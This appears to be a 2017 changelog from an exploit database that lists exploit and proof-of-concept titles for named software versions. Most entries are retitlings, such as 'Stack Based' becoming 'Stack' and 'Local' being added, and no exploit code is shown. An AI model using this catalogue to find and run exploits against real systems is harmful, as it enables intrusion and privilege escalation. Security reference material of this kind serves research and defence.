DB: 2017-12-01

82 changes to exploits/shellcodes

32 new exploits/shellcodes

Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)
Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Overrun (PoC)

CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service
CA BrightStor HSM r11.5 - Remote Stack Overflow / Denial of Service

Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)
Rosoft Media Player 4.1.8 - RML Stack Buffer Overflow (PoC)

Aircrack-NG Tools svn r1675 - Remote Heap-Based Buffer Overflow
Aircrack-NG Tools svn r1675 - Remote Heap Buffer Overflow

FontForge - '.BDF' Font File Stack Based Buffer Overflow
FontForge - '.BDF' Font File Stack Buffer Overflow

Native Instruments Traktor Pro 1.2.6 - Stack Based Buffer Overflow
Native Instruments Traktor Pro 1.2.6 - Stack Buffer Overflow

Libmodplug 0.8.8.2 - '.abc' Stack Based Buffer Overflow (PoC)
Libmodplug 0.8.8.2 - '.abc' Stack Buffer Overflow (PoC)

Citrix XenApp / XenDesktop - Stack Based Buffer Overflow
Citrix XenApp / XenDesktop - Stack Buffer Overflow

Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflows
Oracle DataDirect - Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Buffer Overflows

Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)
Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Buffer Overflow (PoC)

IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow
IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Overflow

Oracle Outside-In - '.LWP' File Parsing Stack Based Buffer Overflow
Oracle Outside-In - '.LWP' File Parsing Stack Buffer Overflow

mcrypt 2.6.8 - Stack Based Buffer Overflow (PoC)
mcrypt 2.6.8 - Stack Buffer Overflow (PoC)
MySQL (Linux) - Stack Based Buffer Overrun (PoC)
MySQL (Linux) - Heap Based Overrun (PoC)
MySQL (Linux) - Stack Buffer Overrun (PoC)
MySQL (Linux) - Heap Overrun (PoC)
Sony PC Companion 2.1 - 'DownloadURLToFile()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'Load()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'CheckCompatibility()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Stack Based Unicode Buffer Overflow
Sony PC Companion 2.1 - 'DownloadURLToFile()' Unicode Stack Buffer Overflow
Sony PC Companion 2.1 - 'Load()' Unicode Stack Buffer Overflow
Sony PC Companion 2.1 - 'CheckCompatibility()' Unicode Stack Buffer Overflow
Sony PC Companion 2.1 - 'Admin_RemoveDirectory()' Unicode Stack Buffer Overflow

DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Based Buffer Overflow
DeleGate 7.8.x/8.x - SSLway Filter Remote Stack Buffer Overflow

GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (1)
GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Buffer Overrun (1)

Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Based Buffer Overflow
Linux Kernel - 'SCTP_GET_ASSOC_STATS()' Stack Buffer Overflow

Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Based Buffer Overflow Denial of Service
Allied Telesyn TFTP (AT-TFTP) Server/Daemon 2.0 - Stack Buffer Overflow Denial of Service

Multiple Vendor Telnet Client - Env_opt_add Heap Based Buffer Overflow
Multiple Vendor Telnet Client - Env_opt_add Heap Buffer Overflow

SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Based Overflow
SAS Integration Technologies Client 9.31_M1 'SASspk.dll' - Stack Overflow

Winamp 5.63 - Stack Based Buffer Overflow
Winamp 5.63 - Stack Buffer Overflow

Apple Mac OSX 10.x - '.zip' BOMStackPop()' Overflow
Apple Mac OSX 10.x - '.zip' 'BOMStackPop()' Overflow

Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap-Based Buffer Overflow (MS14-056)
Microsoft Internet Explorer 11 - MSHTML CPaste­Command::Convert­Bitmapto­Png Heap Buffer Overflow (MS14-056)

MPlayer 1.0 - AVIHeader.C Heap Based Buffer Overflow
MPlayer 1.0 - AVIHeader.C Heap Buffer Overflow
ProWizard 4 PC 1.62 - Multiple Remote Stack Based Buffer Overflow Vulnerabilities
WinUAE 1.4.4 - 'zfile.c' Stack Based Buffer Overflow
ProWizard 4 PC 1.62 - Multiple Remote Stack Buffer Overflow Vulnerabilities
WinUAE 1.4.4 - 'zfile.c' Stack Buffer Overflow

Google Android Web Browser - '.GIF' File Heap Based Buffer Overflow
Google Android Web Browser - '.GIF' File Heap Buffer Overflow

Oracle Outside In MDB - File Parsing Stack Based Buffer Overflow (PoC)
Oracle Outside In MDB - File Parsing Stack Buffer Overflow (PoC)

NASA Ames Research Center BigView 1.8 - '.PNM' Stack Based Buffer Overflow
NASA Ames Research Center BigView 1.8 - '.PNM' Stack Buffer Overflow

FFmpeg libavformat - 'psxstr.c' STR Data Heap Based Buffer Overflow
FFmpeg libavformat - 'psxstr.c' STR Data Heap Buffer Overflow

OpenVms 8.3 Finger Service - Stack Based Buffer Overflow
OpenVms 8.3 Finger Service - Stack Buffer Overflow

Free Download Manager - Stack Based Buffer Overflow
Free Download Manager - Stack Buffer Overflow

Sonique 2.0 - '.xpl' Remote Stack Based Buffer Overflow
Sonique 2.0 - '.xpl' Remote Stack Buffer Overflow

eXPert PDF 7.0.880.0 - '.pj' Heap Based Buffer Overflow
eXPert PDF 7.0.880.0 - '.pj' Heap Buffer Overflow
Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec
Adobe Flash - Heap Based Buffer Overflow Due to Indexing Error When Loading FLV File
Adobe Flash - Heap Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec
Adobe Flash - Heap Buffer Overflow Due to Indexing Error When Loading FLV File

Valhala Honeypot 1.8 - Stack Based Buffer Overflow
Valhala Honeypot 1.8 - Stack Buffer Overflow

Microsoft Office 2007 - Malformed Document Stack Based Buffer Overflow
Microsoft Office 2007 - Malformed Document Stack Buffer Overflow

Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow
Xion Audio Player 1.5 build 155 - Stack Buffer Overflow

Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Based Buffer Overflow
Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow

Last PassBroker 3.2.16 - Stack Based Buffer Overflow
Last PassBroker 3.2.16 - Stack Buffer Overflow

FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Based Out-of-Bounds Reads
FreeType 2.6.1 - TrueType tt_cmap14_validate Parsing Heap Out-of-Bounds Reads
FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Based Out-of-Bounds Read
FBZX 2.10 - Local Stack Based Buffer Overflow
TACK 1.07 - Local Stack Based Buffer Overflow
FreeType 2.6.1 - TrueType tt_sbit_decoder_load_bit_aligned Heap Out-of-Bounds Read
FBZX 2.10 - Local Stack Buffer Overflow
TACK 1.07 - Local Stack Buffer Overflow

Gnome Nautilus 3.16 - Denial of Service
Wireshark - iseries_parse_packet Heap Based Buffer Overflow
Wireshark - dissect_tds7_colmetadata_token Stack Based Buffer Overflow
Wireshark - iseries_parse_packet Heap Buffer Overflow
Wireshark - dissect_tds7_colmetadata_token Stack Buffer Overflow

Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow
Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Buffer Overflow
Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Based Buffer Overflow
Wireshark - find_signature Stack Based Out-of-Bounds Read
Wireshark - AirPDcapPacketProcess Stack Based Buffer Overflow
Wireshark - getRate Stack Based Out-of-Bounds Read
Wireshark - dissect_diameter_base_framed_ipv6_prefix Stack Buffer Overflow
Wireshark - find_signature Stack Out-of-Bounds Read
Wireshark - AirPDcapPacketProcess Stack Buffer Overflow
Wireshark - getRate Stack Out-of-Bounds Read
Wireshark - 'infer_pkt_encap' Heap Based Out-of-Bounds Read
Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (1)
Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read
Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1)
pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Based Out-of-Bounds Read
pdfium - CPDF_TextObject::CalcPositionData Heap Based Out-of-Bounds Read
pdfium - CPDF_DIBSource::DownSampleScanline32Bit Heap Out-of-Bounds Read
pdfium - CPDF_TextObject::CalcPositionData Heap Out-of-Bounds Read

pdfium - CPDF_Function::Call Stack Based Buffer Overflow
pdfium - CPDF_Function::Call Stack Buffer Overflow
pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read
pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read
Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read
Wireshark - dissect_nhdr_extopt Stack Based Buffer Overflow
pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Out-of-Bounds Read
pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Out-of-Bounds Read
Wireshark - 'iseries_check_file_type' Stack Out-of-Bounds Read
Wireshark - dissect_nhdr_extopt Stack Buffer Overflow
Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read
Wireshark - dissect_ber_constrained_bitstring Heap Based Out-of-Bounds Read
Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Out-of-Bounds Read
Wireshark - dissect_ber_constrained_bitstring Heap Out-of-Bounds Read

glibc - 'getaddrinfo' Stack Based Buffer Overflow (PoC)
glibc - 'getaddrinfo' Stack Buffer Overflow (PoC)
Wireshark - vwr_read_s2_s3_W_rec Heap Based Buffer Overflow
libxml2 - xmlDictAddString Heap Based Buffer Overread
libxml2 - xmlParseEndTag2 Heap Based Buffer Overread
libxml2 - xmlParserPrintFileContextInternal Heap Based Buffer Overread
libxml2 - htmlCurrentChar Heap Based Buffer Overread
Wireshark - vwr_read_s2_s3_W_rec Heap Buffer Overflow
libxml2 - xmlDictAddString Heap Buffer Overread
libxml2 - xmlParseEndTag2 Heap Buffer Overread
libxml2 - xmlParserPrintFileContextInternal Heap Buffer Overread
libxml2 - htmlCurrentChar Heap Buffer Overread
Kamailio 4.3.4 - Heap Based Buffer Overflow
Wireshark - dissect_pktc_rekey Heap Based Out-of-Bounds Read
Kamailio 4.3.4 - Heap Buffer Overflow
Wireshark - dissect_pktc_rekey Heap Out-of-Bounds Read

Wireshark - dissect_2008_16_security_4 Stack Based Buffer Overflow
Wireshark - dissect_2008_16_security_4 Stack Buffer Overflow

Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Based Out-of-Bounds Read (2)
Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (2)

Microsoft Windows - 'gdi32.dll' Heap Based Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)
Microsoft Windows - 'gdi32.dll' Heap Buffer Overflow in ExtEscape() Triggerable via EMR_EXTESCAPE EMF Record (MS16-055)
Graphite2 - GlyphCache::GlyphCache Heap Based Buffer Overflow
Graphite2 - GlyphCache::Loader Heap Based Overreads
Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Based Overread
Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Based Overread
Graphite2 - NameTable::getName Multiple Heap Based Out-of-Bounds Reads
Graphite2 - GlyphCache::GlyphCache Heap Buffer Overflow
Graphite2 - GlyphCache::Loader Heap Overreads
Graphite2 - TtfUtil::CheckCmapSubtable12 Heap Overread
Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap Overread
Graphite2 - NameTable::getName Multiple Heap Out-of-Bounds Reads

Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Based Memory Corruption
Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap Memory Corruption

Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Based Out-of-Bounds Reads/Memory Disclosure (MS16-074)
Microsoft Windows - 'gdi32.dll' Multiple DIB-Related EMF Record Handlers Heap Out-of-Bounds Reads/Memory Disclosure (MS16-074)

Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Based Buffer Overflow (MS16-097)
Microsoft Windows - GDI+ EMR_EXTTEXTOUTA / EMR_POLYTEXTOUTA Heap Buffer Overflow (MS16-097)

Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap-Based Out-of-Bounds Reads / Memory Disclosure
Microsoft Windows - 'gdi32.dll' EMR_SETDIBITSTODEVICE Heap Out-of-Bounds Reads / Memory Disclosure

Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow
Microsoft Windows - 'LoadUvsTable()' Heap Buffer Overflow
Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap-Based Buffer Overflow (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011)
Microsoft Windows - 'USP10!otlList::insertAt' Uniscribe Font Processing Heap Buffer Overflow (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Read/Write in 'USP10!AssignGlyphTypes' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)
Microsoft Windows - Uniscribe Font Processing Heap Memory Corruption Around 'USP10!BuildFSM' (MS17-011)

Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011)
Microsoft Windows - Uniscribe Font Processing Multiple Heap Out-of-Bounds and Wild Reads (MS17-011)

Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)
Microsoft Windows - Uniscribe Heap Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)

SAP SAPCAR 721.510 - Heap-Based Buffer Overflow
SAP SAPCAR 721.510 - Heap Buffer Overflow

Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption
Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap Memory Corruption

LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow
LAME 3.99.5 - 'III_dequantize_sample' Stack Buffer Overflow

OpenJPEG - 'mqc.c' Heap-Based Buffer Overflow
OpenJPEG - 'mqc.c' Heap Buffer Overflow

tcprewrite - Heap-Based Buffer Overflow
tcprewrite - Heap Buffer Overflow
Dnsmasq < 2.78 - 2-byte Heap-Based Overflow
Dnsmasq < 2.78 - Heap-Based Overflow
Dnsmasq < 2.78 - Stack-Based Overflow
Dnsmasq < 2.78 - 2-byte Heap Overflow
Dnsmasq < 2.78 - Heap Overflow
Dnsmasq < 2.78 - Stack Overflow

binutils 2.29.51.20170921 - 'read_1_byte' Heap-Based Buffer Overflow
binutils 2.29.51.20170921 - 'read_1_byte' Heap Buffer Overflow

PHP 7.1.8 - Heap-Based Buffer Overflow
PHP 7.1.8 - Heap Buffer Overflow
QEMU - NBD Server Long Export Name Stack Buffer Overflow
Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page

TerminatorX 3.81 - Local Stack Overflow / Privilege Escalation
TerminatorX 3.81 - Local Stack Overflow / Local Privilege Escalation

BSDi 3.0 inc - Local Buffer Overflow / Privilege Escalation
BSDi 3.0 inc - Local Buffer Overflow / Local Privilege Escalation

RedHat 6.1 - 'man' Local Overflow / Privilege Escalation
RedHat 6.1 - 'man' Local Overflow / Local Privilege Escalation

IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Privilege Escalation
IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation

AIX lquerylv - Local Buffer Overflow / Privilege Escalation
AIX lquerylv - Local Buffer Overflow / Local Privilege Escalation

IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Privilege Escalation
IRIX 5.3 - '/usr/sbin/iwsh' Local Buffer Overflow / Local Privilege Escalation

libxml 2.6.12 nanoftp - Remote Buffer Overflow (PoC)
libxml 2.6.12 nanoftp - Buffer Overflow (PoC)

Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Privilege Escalation
Apple Mac OSX 10.3.8 - 'CF_CHARSET_PATH' Local Buffer Overflow / Local Privilege Escalation

Gopher 3.0.9 - '+VIEWS' Remote Client-Side Buffer Overflow
Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow

XMail 1.21 - '-t' Command Line Option Buffer Overflow / Privilege Escalation
XMail 1.21 - '-t' Command Line Option Local Buffer Overflow / Local Privilege Escalation

Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation
Linux Kernel 2.6.9 < 2.6.11 (RHEL 4) - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation

Microsoft Excel - Remote Code Execution
Microsoft Excel - Code Execution
HP-UX 11i - 'swpackage' Local Stack Overflow / Privilege Escalation
HP-UX 11i - 'swmodify' Local Stack Overflow / Privilege Escalation
HP-UX 11i - 'swpackage' Local Stack Overflow / Local Privilege Escalation
HP-UX 11i - 'swmodify' Local Stack Overflow / Local Privilege Escalation

Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Overflow / Privilege Escalation
Kaspersky Internet Security 6.0.0.303 - IOCTL KLICK Local Overflow / Local Privilege Escalation

News Rover 12.1 Rev 1 - Remote Stack Overflow (1)
News Rover 12.1 Rev 1 - Stack Overflow (1)

News Rover 12.1 Rev 1 - Remote Stack Overflow (2)
News Rover 12.1 Rev 1 - Stack Overflow (2)

FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Privilege Escalation
FreeBSD mcweject 0.9 'Eject' - Local Buffer Overflow / Local Privilege Escalation

Apple Mac OSX - mount_smbfs Stack Based Buffer Overflow
Apple Mac OSX - 'mount_smbfs' Local Stack Buffer Overflow

VideoLAN VLC Media Player 0.9.4 - '.TY' File Stack Based Buffer Overflow
VideoLAN VLC Media Player 0.9.4 - '.TY' Local Stack Buffer Overflow

Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)
Free Download Manager - '.Torrent' File Parsing Multiple Buffer Overflow Vulnerabilities (Metasploit)

MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows
MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Buffer Overflows

Libmodplug - 's3m' Remote Buffer Overflow
Libmodplug - 's3m' Buffer Overflow

Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)
Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Code Execution (Add Admin)

EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Remote Buffer Overflow (PoC)
EDraw Flowchart ActiveX Control 2.3 - '.edd parsing' Buffer Overflow (PoC)

Microsoft Visio 2002 - '.DXF' File Stack based Overflow
Microsoft Visio 2002 - '.DXF' Local Stack Overflow

AOL 9.5 - 'Phobos.Playlist Import()' Stack Based Buffer Overflow (Metasploit)
AOL 9.5 - 'Phobos.Playlist Import()' Stack Buffer Overflow (Metasploit)

CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (SEH) (Metasploit)
CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (SEH) (Metasploit)

CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow (Metasploit)
CCMPlayer 1.5 - '.m3u' Stack Buffer Overflow (Metasploit)

Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)
Foxit Reader 3.0 - Open Execute Action Stack Buffer Overflow (Metasploit)

Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Privilege Escalation
Sun Solaris 7.0 - '/usr/dt/bin/sdtcm_convert' Local Overflow / Local Privilege Escalation

BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Privilege Escalation (1)
BSD/OS 2.1 / DG/UX 7.0 / Debian 1.3 / HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.4 / Solaris 2.5.1 - 'xlock' Local Overflow / Local Privilege Escalation (1)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (1)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (2)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Privilege Escalation (3)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (1)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (2)
BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Local Overflow / Local Privilege Escalation (3)

S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Privilege Escalation
S.u.S.E Linux 5.2 - 'gnuplot' Local Overflow / Local Privilege Escalation

Novell Netware 4.1/4.11 - SP5B Remote.NLM Weak Encryption

SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Privilege Escalation
SuSE Linux 6.1/6.2 - 'cwdtools' Local Overflow / Local Privilege Escalation

Solaris 7.0 - 'kcms_configure' Local Overflow / Privilege Escalation
Solaris 7.0 - 'kcms_configure' Local Overflow / Local Privilege Escalation

Internet Download Manager - Stack Based Buffer Overflow
Internet Download Manager - Local Stack Buffer Overflow

AFD 1.2.x - Working Directory Local Buffer Overflow / Privilege Escalation
AFD 1.2.x - Working Directory Local Buffer Overflow / Local Privilege Escalation

mcrypt 2.5.8 - Stack Based Overflow
mcrypt 2.5.8 - Local Stack Overflow

Sendmail 8.12.9 - 'Prescan()' Variant Remote Buffer Overrun

Microsoft Windows NT 4.0/2000 - POSIX Subsystem Buffer Overflow / Privilege Escalation (MS04-020)
Microsoft Windows NT 4.0/2000 - POSIX Subsystem Local Buffer Overflow / Local Privilege Escalation (MS04-020)

Newsgrab 0.5.0pre4 - Multiple Local/Remote Vulnerabilities

Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Integer Overflow / Privilege Escalation (1)
Linux Kernel 2.6.x - 'SYS_EPoll_Wait' Local Integer Overflow / Local Privilege Escalation (1)

Winamp 5.12 - '.m3u' Stack Based Buffer Overflow
Winamp 5.12 - '.m3u' Local Stack Buffer Overflow

RealNetworks RealOne Player/RealPlayer - '.RM' Local Stack Buffer Overflow

KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite
KingView 6.53 - 'KChartXY' ActiveX File Creation / Overwrite

BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow
BlazeDVD Pro Player 6.1 - Direct RET Local Stack Buffer Overflow

Super Player 3500 - '.m3u' Local Stack Based Buffer Overflow
Super Player 3500 - '.m3u' Local Stack Buffer Overflow

IBM AIX 5.2/5.3 - Capture Command Local Stack Based Buffer Overflow
IBM AIX 5.2/5.3 - Capture Command Local Stack Buffer Overflow
MuPDF 1.3 - Stack Based Buffer Overflow in xps_parse_color()
GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow
MuPDF 1.3 - Stack Buffer Overflow in xps_parse_color()
GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Buffer Overflow

MicroP 0.1.1.1600 - '.mppl' Local Stack Based Buffer Overflow
MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow

Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Privilege Escalation
Anti-Trojan Elite 4.2.1 - 'Atepmon.sys' IOCTL Request Local Overflow / Local Privilege Escalation

BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow Jump ESP
BlazeDVD Pro Player 6.1 - Stack Buffer Overflow Jump ESP

Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Privilege Escalation
Symantec Endpoint Protection 11.x/12.x - Kernel Pool Overflow / Local Privilege Escalation

BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RET Buffer Overflow
BlazeDVD Pro Player 7.0 - '.plf' Direct RET Local Stack Buffer Overflow

BlueVoda Website Builder 11 - '.bvp' Local Stack Buffer Overflow

Sim Editor 6.6 - Stack Based Buffer Overflow
Sim Editor 6.6 - Local Stack Buffer Overflow

Microsoft Word - Local Machine Zone Remote Code Execution (MS15-022)
Microsoft Word - Local Machine Zone Code Execution (MS15-022)

Symantec Encryption Desktop 10 - Local Buffer Overflow / Privilege Escalation
Symantec Encryption Desktop 10 - Local Buffer Overflow / Local Privilege Escalation

AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow
AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow

EasyCafe Server 2.2.14 - Remote File Read
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (1)
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Privilege Escalation (2)
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)
Linux Kernel 4.4.1 - REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (2)

Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)
Microsoft Excel - Out-of-Bounds Read Code Execution (MS16-042)

TRN Threaded USENET News Reader 3.6-23 - Local Stack Based Overflow
TRN Threaded USENET News Reader 3.6-23 - Local Stack Overflow

NRSS Reader 0.3.9 - Local Stack Based Overflow
NRSS Reader 0.3.9 - Local Stack Overflow

Linux - ecryptfs and /proc/$pid/environ Privilege Escalation
Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation

Cuckoo Sandbox Guest 2.0.1 - XMLRPC Privileged Remote Code Execution

Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)
Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Code Execution (MS16-099)

NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Stack Buffer Overflow Callback / Privilege Escalation
NVIDIA Driver - NvStreamKms 'PsSetCreateProcessNotifyRoutineEx Local Stack Buffer Overflow Callback / Local Privilege Escalation

Cemu 1.6.4b - Information Leak / Buffer Overflow (Emulator Breakout)

Microsoft Remote Desktop Client for Mac 8.0.36 - Remote Code Execution
Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution

Man-db 2.6.7.1 - Local Privilege Escalation (PoC)

Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)
Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Code Execution (Metasploit)

Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)
Nitro Pro PDF Reader 11.0.3.173 - Javascript API Code Execution (Metasploit)

PDF-XChange Viewer 2.5 Build 314.0 - Remote Code Execution
PDF-XChange Viewer 2.5 Build 314.0 - Code Execution

